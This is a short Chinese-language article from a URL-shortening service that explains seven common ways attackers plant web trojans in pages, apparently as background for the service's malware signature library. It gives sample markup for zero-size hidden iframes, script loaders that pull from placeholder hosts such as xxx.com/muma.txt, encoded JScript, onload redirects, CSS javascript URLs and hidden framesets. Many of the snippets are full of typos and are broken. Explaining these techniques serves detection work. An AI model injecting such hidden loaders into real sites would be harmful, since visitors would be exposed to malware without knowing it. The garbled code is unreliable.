![码人网mrw.so缩短网址文章图片](\"/uploads/allimg/190213/1-1Z213095U1958.jpg\")
短网址网页木马解析之常见挂马方式
由于该技术是公司项目,主要为互联网提供安全保护服务,因此在项目成立初就针对这些网站进行了详细的调研,对此类站点遇到的挂马方式进行了详细的总结和整理,再结合目前互联网上的主流挂马方式,建立起短网址的木马特征库。根据前期调研总结了此类站点最常的挂马方式.具体如下:
短网址木马解析1、框架挂马:
<ifiaine src ="网页木马地址"width = “0” height = “0”></iframe>
iframe是普通的HTML标签,主要用来在一个网页界面中,划分出左右或者上下的框架,侵入者利用ifome的功能,在正常网页中,写入长宽为0的隐藏框架,让用户在不知不觉中就打开了木马网站。
短网址木马解析2、JS文件挂马:
JS文件挂马方法是,将指向木马的代码写入文件,保存为xxx.js,然后通过写入<script language= "javascript" src = "xxx.Js”></script>来实现桂马。指向木马的代码如下:
documet.write("<iframe width =”0” height = "0" src=’网页木马地址’>”)。
短网址木马解析3、JS变形加密:
利用jscript.encode加密,会使代码更具隐蔽性,这里的挂马网址的文件后缀是muma.txt,除此之外,还可以引入其他扩展名的JS代码。
<script language ="jscript.Encode” src =
"http://www.xxx.com/muma.txt”></script>
短网址木马解析4、body挂马:
使用如下代码,就可政使网页在加载完成的时候跳转到网页木马的网址
<body onload ="window.location =’网页木马地址’;”></body〉。
短网址木马解析5、css挂马:
在文挡的样式表中使用URL函数引入木马链接,具体格式如下:
body { background-image : url (‘javascript:
document.write ("<script src
=’http://www.xx.Net/muma.Js’〉</script>”)’)}。
短网址木马解析6、图片挂码:
这种挂马方式利用图片作为伪装,用户点击图片,一个看不见的窗口被激活运行,木马也随之被运行。挂马代码如下:
<html>
<iframe src =’网页木马地址’height = 0 width
= 0 ></iframe>
<Lmg src =‘图片地址’></center>
</html>
短网址木马解析7、利用隐藏的分割框架引入网页木马:示例代码如下:
<frameset row = ‘‘444,0”cols = "*”>
<frame src =”打开网页”framborder = "no" scrolling
=”auto"noresize marginwidth=‘”0”marginheight="0”>
<fiame src="网巧木马地址"framborder = "no" scrolling
= "auto" noresize marginwidth=”0”marginheight = "0’’>